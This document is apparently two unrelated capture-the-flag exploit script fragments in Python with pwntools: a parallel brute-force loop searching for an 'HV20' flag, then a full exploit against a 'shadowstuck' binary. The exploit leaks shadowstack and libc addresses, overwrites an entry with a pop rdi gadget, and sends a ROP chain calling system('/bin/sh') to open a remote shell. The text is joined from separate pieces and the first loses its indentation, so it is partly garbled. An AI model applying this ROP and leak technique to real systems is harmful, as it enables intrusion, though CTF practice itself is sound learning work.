p.sendline(str(input))
output = p.recvall().decode('ascii')
flag = output.split('Unlocked secret is:')[1].strip()
if not flag.startswith("H"):
output_file.write(f"Error: Invalid flag {flag} for input {input}\n")
output_file.write(f"{flag} for {input}\n")
if "HV20" in flag:
print(flag + " " + pid)
exit(0)
count += 1
if count % 100 == 0:
print(f"HV PID {pid} has {count}/{len(search)}")
search = list(elf.search(assembly_for_h))
a, b, c, d = array_split(search, 4)
p1 = Process(target=lambda: brute_force_range(a, "1"))
p2 = Process(target=lambda: brute_force_range(b, "2"))
p3 = Process(target=lambda: brute_force_range(c, "3"))
p4 = Process(target=lambda: brute_force_range(d, "4"))
p1.start()
p2.start()
p3.start()
p4.start()
p = remote("challenges.ctf.kaf.sh", 8000)
#p = process('./shadowstuck', env={"LD_PRELOAD":"./libc-2.31.so"})
libc = ELF('./libc-2.31.so')
base_shadowstack = int(p.recvline().split(b'at ')[1][:-1], 16)
print("[+] Shadowstack @ 0x%x" % base_shadowstack)
add_employee("Mike") #0
fire_employee("Mike", b'a' * 0x10 + pack(base_shadowstack)[:-2])
leak = unpack(read_employee(1).ljust(8, b'\x00'))
print("[+] Leak libc @ 0x%x" % leak)
libc.address = leak - 159923
print("[+] Libc @ 0x%x" % libc.address)
pop_rdi_gadget = libc.address + 0x26b72
change_employee(1, pack(pop_rdi_gadget).rstrip(b'\x00'))
assert unpack(read_employee(1).ljust(8, b'\x00')) == pop_rdi_gadget
rop = b"aaaaaaaaaaaaaaaaaaaaaaaaa" #padding
rop += pack(pop_rdi_gadget)
rop += pack(next(libc.search(b'/bin/sh')))
rop += pack(pop_rdi_gadget + 1) #for stack alignment
rop += pack(libc.symbols['system'])
employee_exit(rop)
p.interactive()
